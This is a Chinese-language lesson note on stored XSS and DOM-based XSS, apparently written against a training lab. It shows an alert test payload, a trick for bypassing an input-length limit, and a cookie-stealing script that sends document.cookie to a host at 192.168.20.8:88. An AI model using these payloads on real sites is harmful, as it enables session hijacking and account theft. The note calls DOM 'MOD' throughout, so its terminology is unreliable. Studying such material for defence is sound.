任务100:存储型XSS和BEEF浏览器攻击框架
1.存储性XSS漏洞
- 存储性XSS漏洞
叫恶意的脚本代码一次性注入到存在漏洞的页面上,然后有人访问到这个页面客户端的浏览器就会运行恶意的脚本代码。
存储性XSS漏洞会长时间存在服务器端
像留言板留言簿都有可能存在xss漏洞
-
检查是否有XSS漏洞
发现没有过滤
弹出窗口js代码
弹出就有XSS漏洞<script>alert('有XSS漏洞')</script>
发现执行了
burp看一下源代码
现在这个我注入的脚本代码就已经长期在这个页面上面了每次访问都会出现这个窗口
每次别人都会自己下载脚本本地浏览器执行
服务器都已经叫这个恶业代码已经写入数据库了
-
利用和反射型的一样只是存储型直接访问就运行了,做盗窃Cookie了等等等
这个利用演示就不演示了看这个就明白了
1. XSS-简介,反射型、跨站脚本检测和常见的攻击利用手段
2. XSS- 键盘记录器和反射型XSS -
输入框无视限制
正常情况下最多输入只能10
输入框无视限制进入在burp就不需要修改限制了应为没有限制
在浏览器里有限制可以修改的下面演示
点击要修改的输入框,就显示代码了
看限制是10
改成更大的就可以输入更多的字符了
-
安全级别
低安全级别上面演示的就是低安全级别
是没有进行任何过滤的
中安全级别
下面是输出<script>
就为没有都没有
看一下
2.MOD型XSS漏洞
严格来说MOD也算是反射型的
-
MOD就是一个标准的API
可以用脚本语言js调用API来进行对网页的所有的元素进行任何操作修改,删除,创建
浏览器会给专属于这个页面的Document object(文档对象),这个Document object(围挡对象)下面建立子对象这些子文档对象 这些文档对象都对应这一个元素每个元素都对应这文档对象js脚本就可以进行文档对象进行修改,删除,创建了
MOD漏洞利用
在有XSS漏洞的网站输入<script>var img=document.createElement("img");img.src="http:// 192.168.20.8:88/log?"+escape(document.cookie);</script>
介绍img等于mod方法标准的api,createElement也就是创建一个元素定义了一个图片对象这个照片在192.168.20.8:88/log里去取照片然后叫自己的cookie发送给黑客